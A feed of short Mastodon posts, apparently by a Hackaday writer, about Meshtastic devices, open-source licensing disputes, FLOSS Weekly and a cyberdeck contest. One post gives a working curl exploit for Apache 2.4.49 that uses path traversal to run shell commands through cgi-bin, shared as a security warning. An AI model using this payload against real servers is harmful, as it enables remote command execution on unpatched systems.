@BrodieOnLinux@mstdn.social @KuJoe@mindly.social The Rak4631 is one of the favorite units for repeaters and DIY installs. The T-Deck pro is a nifty pre-made device, and once the new MUI interface is released as a public preview, it will be a great experience. The Seeed Sensecap indicator is a great desk top device for MUI as well. Then there's the whole Meshtasticd rabbit hole, where you can run on Linux. Come to Discord to get those details.

@vaughn @evan@cosocial.ca @dsearls@journa.host Hey, just so you know, FLOSS Weekly has a new home at HTTPS://hackaday.com/FLOSS ! Look there for season 4 episodes!
@almalinux@fosstodon.org @webmink@meshed.cloud So what do we think? Does the additional restriction against re-publishing constitute a GPL violation?
@kicou@kicou.info @szczys@chaos.social Is there more to this story than a CVE that a developer didn't like? I went digging for the rest of the story, and came up dry.
@webmink@meshed.cloud @almalinux@fosstodon.org @conservancy@social.sfconservancy.org A cease-and-desist from a thousand software developers might go a long ways towards righting RedHat's course.
My coverage of the D&D licensing poison pill: https://hackaday.com/2023/01/11/wizards-slay-the-dragon-that-lays-the-golden-egg/
Tip of the hat to @webmink@meshed.cloud for the observation that "licenses don't compile". Important point to consider in my upcoming coverage of the Open Gaming License update.
@RoyGreenhilt@mastodon.social Hey, we're just using Hackaday.io as our entry system. You can totally use a link to your blog post for the primary write-up. (See https://hackaday.com/2022/08/20/2022-cyberdeck-contest-extruded-rig-exudes-coolness/ for an example.) Just think of Hackaday.io as a contest entry form.
@webmink@meshed.cloud Would love to see a cooperation between projects and bounties, before the project gets marked as a target. "Would it be helpful for us to do this?" is always a good starting place when trying to help.
Apache 2.4.49 has a huge security problem: curl --data "A=|echo;id" 'http://127.0.0.1:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' -vv
@lrvick@mastodon.social I looked into doing the certification thing early in my career. It took about 2 hours of studying to realize that the test was going to be terribly out of date, and in some cases, factually incorrect. Happily certificationless.
